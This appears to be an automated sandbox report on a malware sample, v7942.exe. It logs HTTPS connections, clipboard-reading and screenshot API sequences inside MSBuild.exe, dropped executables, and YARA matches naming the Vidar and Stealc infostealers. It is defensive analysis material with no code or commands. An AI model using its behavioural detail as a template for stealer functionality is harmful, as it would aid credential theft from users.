Source: unknown Network traffic detected: HTTP traffic on port 49830 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49769
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49768
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49766
Source: unknown Network traffic detected: HTTP traffic on port 49758 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49885
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown Network traffic detected: HTTP traffic on port 49840 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49857 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49764 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49797 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49801 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49758
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49879
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49875
Source: unknown Network traffic detected: HTTP traffic on port 49891 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49873
Source: unknown Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49872
Source: unknown Network traffic detected: HTTP traffic on port 49818 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49687 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49846 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown Network traffic detected: HTTP traffic on port 49792 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49868
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49745
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49866
Source: unknown Network traffic detected: HTTP traffic on port 49672 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49769 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49849 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49866 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49820 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49872 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49855 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49798 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49687
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49686
Source: unknown Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49819 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49844 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49685
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49684
Source: unknown Network traffic detected: HTTP traffic on port 49873 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49787 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49831 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49799
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49798
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49797
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49795
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49794
Source: unknown Network traffic detected: HTTP traffic on port 49814 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49792
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49791
Source: unknown Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49856 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49768 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49808 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49789
Source: unknown Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49821
Source: unknown Network traffic detected: HTTP traffic on port 49865 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49820
Source: unknown Network traffic detected: HTTP traffic on port 49842 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49779 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49859 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49762 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49894 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49833 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49819
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49818
Source: unknown Network traffic detected: HTTP traffic on port 49799 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49810 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49817
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49815
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49814
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49813
Source: unknown Network traffic detected: HTTP traffic on port 49902 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49811
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49810
Source: unknown Network traffic detected: HTTP traffic on port 49794 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49685 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49808
Source: unknown Network traffic detected: HTTP traffic on port 49848 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49802
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49801
Source: unknown Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49800
Source: unknown Network traffic detected: HTTP traffic on port 49821 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49815 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49684 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49860 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49778 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49843 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49832 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49902
Source: unknown HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.5:49723 version: TLS 1.2
Source: unknown HTTPS traffic detected: 78.47.63.132:443 -> 192.168.2.5:49724 version: TLS 1.2
Source: unknown HTTPS traffic detected: 23.197.127.21:443 -> 192.168.2.5:49866 version: TLS 1.2
Source: unknown HTTPS traffic detected: 2.23.227.208:443 -> 192.168.2.5:49898 version: TLS 1.2
Source: unknown HTTPS traffic detected: 23.197.127.21:443 -> 192.168.2.5:49902 version: TLS 1.2
Contains functionality for read data from the clipboard
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 29_2_0043F410 OpenClipboard,GetClipboardData,GlobalLock,GetWindowRect,GlobalUnlock,CloseClipboard, 29_2_0043F410
Contains functionality to read the clipboard data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 29_2_0043F410 OpenClipboard,GetClipboardData,GlobalLock,GetWindowRect,GlobalUnlock,CloseClipboard, 29_2_0043F410
Contains functionality to record screenshots
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_00410A90 CreateStreamOnHGlobal,GetDesktopWindow,GetWindowRect,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,malloc,StrCmpCW,GetHGlobalFromStream,GlobalLock,GlobalSize,SelectObject,DeleteObject,DeleteObject,DeleteObject,ReleaseDC,CloseWindow, 3_2_00410A90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_00406480 memcpy,OpenDesktopA,CreateDesktopA,lstrcpyA,CreateProcessA,Sleep,CloseDesktop, 3_2_00406480

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: 3.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Finds Vidar samples based on the specific strings Author: Sekoia.io
Source: 3.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Finds Vidar samples based on the specific strings Author: Sekoia.io
Source: 32.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Finds Stealc standalone samples (or dumps) based on the strings Author: Sekoia.io
Source: 32.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Finds Stealc standalone samples (or dumps) based on the strings Author: Sekoia.io
Source: 00000020.00000002.2338379546.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Finds Stealc standalone samples (or dumps) based on the strings Author: Sekoia.io
Source: 00000003.00000002.1838657212.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Finds Vidar samples based on the specific strings Author: Sekoia.io
Detected potential crypto function
Source: C:\Users\user\Desktop\v7942.exe Code function: 0_2_00007FF681511560 0_2_00007FF681511560
Source: C:\Users\user\Desktop\v7942.exe Code function: 0_2_00007FF68151E830 0_2_00007FF68151E830
Source: C:\Users\user\Desktop\v7942.exe Code function: 0_2_00007FF681517640 0_2_00007FF681517640
Source: C:\Users\user\Desktop\v7942.exe Code function: 0_2_00007FF68151E194 0_2_00007FF68151E194
Source: C:\Users\user\Desktop\v7942.exe Code function: 0_2_00007FF68151A96C 0_2_00007FF68151A96C
Source: C:\Users\user\Desktop\v7942.exe Code function: 0_2_00007FF6815221D8 0_2_00007FF6815221D8
Source: C:\Users\user\Desktop\v7942.exe Code function: 0_2_00007FF6815111C0 0_2_00007FF6815111C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_00404A20 3_2_00404A20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_00418630 3_2_00418630
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_0041B770 3_2_0041B770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_0041B300 3_2_0041B300
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_0041C100 3_2_0041C100
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_004193D0 3_2_004193D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_0041A7D0 3_2_0041A7D0
Source: C:\ProgramData\ph4eu37qie.exe Code function: 26_2_00007FF70668E830 26_2_00007FF70668E830
Source: C:\ProgramData\ph4eu37qie.exe Code function: 26_2_00007FF706681560 26_2_00007FF706681560
Source: C:\ProgramData\ph4eu37qie.exe Code function: 26_2_00007FF70668E194 26_2_00007FF70668E194
Source: C:\ProgramData\ph4eu37qie.exe Code function: 26_2_00007FF70668A96C 26_2_00007FF70668A96C
Source: C:\ProgramData\ph4eu37qie.exe Code function: 26_2_00007FF7066921D8 26_2_00007FF7066921D8
Source: C:\ProgramData\ph4eu37qie.exe Code function: 26_2_00007FF7066811C0 26_2_00007FF7066811C0
Source: C:\ProgramData\ph4eu37qie.exe Code function: 26_2_00007FF706687640 26_2_00007FF706687640
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 29_2_0040BA50 29_2_0040BA50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 29_2_0040E6D0 29_2_0040E6D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 29_2_00401040 29_2_00401040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 29_2_0041F065 29_2_0041F065
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 29_2_00417870 29_2_00417870
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 29_2_0041C833 29_2_0041C833
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 29_2_00427830 29_2_00427830
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 29_2_00445830 29_2_00445830
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 29_2_00449832 29_2_00449832
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 29_2_004380C8 29_2_004380C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 29_2_004110F9 29_2_004110F9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 29_2_00421890 29_2_00421890
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 29_2_004378B8 29_2_004378B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 29_2_0040D940 29_2_0040D940
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 29_2_00402140 29_2_00402140
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 29_2_00426150 29_2_00426150
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 29_2_00451150 29_2_00451150
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 29_2_00439160 29_2_00439160
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 29_2_00442168 29_2_00442168
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 29_2_0040B970 29_2_0040B970
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 29_2_00451170 29_2_00451170
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 29_2_00424900 29_2_00424900
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 29_2_0042D92B 29_2_0042D92B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 29_2_0045113C 29_2_0045113C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 29_2_0040F9C0 29_2_0040F9C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 29_2_004139D0 29_2_004139D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 29_2_0043B9F9 29_2_0043B9F9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 29_2_00412185 29_2_00412185
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 29_2_00445250 29_2_00445250
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 29_2_00429A70 29_2_00429A70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 29_2_0042020C 29_2_0042020C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 29_2_00426A15 29_2_00426A15
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 29_2_0041E21B 29_2_0041E21B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 29_2_004292C0 29_2_004292C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 29_2_0044CAE0 29_2_0044CAE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 29_2_00412AF8 29_2_00412AF8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 29_2_00408A80 29_2_00408A80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 29_2_0044B280 29_2_0044B280
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 29_2_00431290 29_2_00431290
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 29_2_00445AA0 29_2_00445AA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 29_2_004512AC 29_2_004512AC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 29_2_004252B0 29_2_004252B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 29_2_00402B50 29_2_00402B50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 29_2_0041C833 29_2_0041C833
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 29_2_00444300 29_2_00444300
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 29_2_0040A320 29_2_0040A320
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 29_2_0040C320 29_2_0040C320
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 29_2_00416B81 29_2_00416B81
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 29_2_0044B380 29_2_0044B380
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 29_2_0042CBA0 29_2_0042CBA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 29_2_004283A0 29_2_004283A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 29_2_0044C3A0 29_2_0044C3A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 29_2_00411C5F 29_2_00411C5F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 29_2_0042D460 29_2_0042D460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 29_2_00432407 29_2_00432407
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 29_2_0043F410 29_2_0043F410
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 29_2_0042F430 29_2_0042F430
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 29_2_0043DC31 29_2_0043DC31
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 29_2_004384C3 29_2_004384C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 29_2_0041BCC0 29_2_0041BCC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 29_2_0040D4D0 29_2_0040D4D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 29_2_004434DF 29_2_004434DF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 29_2_0041DCDF 29_2_0041DCDF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 29_2_0044B4F0 29_2_0044B4F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 29_2_00410483 29_2_00410483
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 29_2_0042F489 29_2_0042F489
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 29_2_00424C90 29_2_00424C90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 29_2_0044BCB6 29_2_0044BCB6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 29_2_00409540 29_2_00409540
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 29_2_00443540 29_2_00443540
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 29_2_0043155F 29_2_0043155F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 29_2_00403560 29_2_00403560
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 29_2_00425560 29_2_00425560
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 29_2_00413D09 29_2_00413D09
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 29_2_0040AD20 29_2_0040AD20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 29_2_0043B536 29_2_0043B536
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 29_2_0041EDDC 29_2_0041EDDC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 29_2_00447DF0 29_2_00447DF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 29_2_0044B580 29_2_0044B580
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 29_2_00420D90 29_2_00420D90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 29_2_00407DA0 29_2_00407DA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 29_2_004305B2 29_2_004305B2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 29_2_0042FE40 29_2_0042FE40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 29_2_00433640 29_2_00433640
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 29_2_00448650 29_2_00448650
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 29_2_0043C610 29_2_0043C610
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 29_2_0044CE10 29_2_0044CE10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 29_2_00437627 29_2_00437627
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 29_2_0044B622 29_2_0044B622
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 29_2_0040CE30 29_2_0040CE30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 29_2_00444ED0 29_2_00444ED0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 29_2_00445ED1 29_2_00445ED1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 29_2_004326E0 29_2_004326E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 29_2_004386EC 29_2_004386EC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 29_2_00415EF9 29_2_00415EF9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 29_2_00430E93 29_2_00430E93
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 29_2_00410EAB 29_2_00410EAB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 29_2_00403F00 29_2_00403F00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 29_2_0043E703 29_2_0043E703
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 29_2_0041AF00 29_2_0041AF00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 29_2_0040C710 29_2_0040C710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 29_2_00436729 29_2_00436729
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 29_2_0042D730 29_2_0042D730
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 29_2_00408FC0 29_2_00408FC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 29_2_0044C7D0 29_2_0044C7D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 29_2_004047E2 29_2_004047E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 29_2_004437A0 29_2_004437A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 29_2_0040EFAE 29_2_0040EFAE
Source: C:\ProgramData\zmgdjecba1.exe Code function: 30_2_00007FF707B1E830 30_2_00007FF707B1E830
Source: C:\ProgramData\zmgdjecba1.exe Code function: 30_2_00007FF707B11560 30_2_00007FF707B11560
Source: C:\ProgramData\zmgdjecba1.exe Code function: 30_2_00007FF707B17640 30_2_00007FF707B17640
Source: C:\ProgramData\zmgdjecba1.exe Code function: 30_2_00007FF707B221D8 30_2_00007FF707B221D8
Source: C:\ProgramData\zmgdjecba1.exe Code function: 30_2_00007FF707B111C0 30_2_00007FF707B111C0
Source: C:\ProgramData\zmgdjecba1.exe Code function: 30_2_00007FF707B1A96C 30_2_00007FF707B1A96C
Source: C:\ProgramData\zmgdjecba1.exe Code function: 30_2_00007FF707B1E194 30_2_00007FF707B1E194
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 32_2_004248D0 32_2_004248D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 32_2_61E88FCA 32_2_61E88FCA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 32_2_61EAD2AC 32_2_61EAD2AC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 32_2_61E4B8A1 32_2_61E4B8A1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 32_2_61E75F1F 32_2_61E75F1F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 32_2_61E40065 32_2_61E40065
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 32_2_61E9E24F 32_2_61E9E24F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 32_2_61E5023C 32_2_61E5023C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 32_2_61E62554 32_2_61E62554
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 32_2_61E9A4A7 32_2_61E9A4A7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 32_2_61E4E4BF 32_2_61E4E4BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 32_2_61E94783 32_2_61E94783
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 32_2_61E7A790 32_2_61E7A790
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 32_2_61E18736 32_2_61E18736
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 32_2_61E86668 32_2_61E86668
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 32_2_61E58670 32_2_61E58670
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 32_2_61E10856 32_2_61E10856
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 32_2_61EA0BA9 32_2_61EA0BA9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 32_2_61E62CA3 32_2_61E62CA3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 32_2_61E98FE2 32_2_61E98FE2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 32_2_61E52F80 32_2_61E52F80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 32_2_61EA2F47 32_2_61EA2F47
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 32_2_61E56F18 32_2_61E56F18
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 32_2_61E4CEF9 32_2_61E4CEF9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 32_2_61E1EEFF 32_2_61E1EEFF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 32_2_61E64E0C 32_2_61E64E0C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 32_2_61EA91F6 32_2_61EA91F6
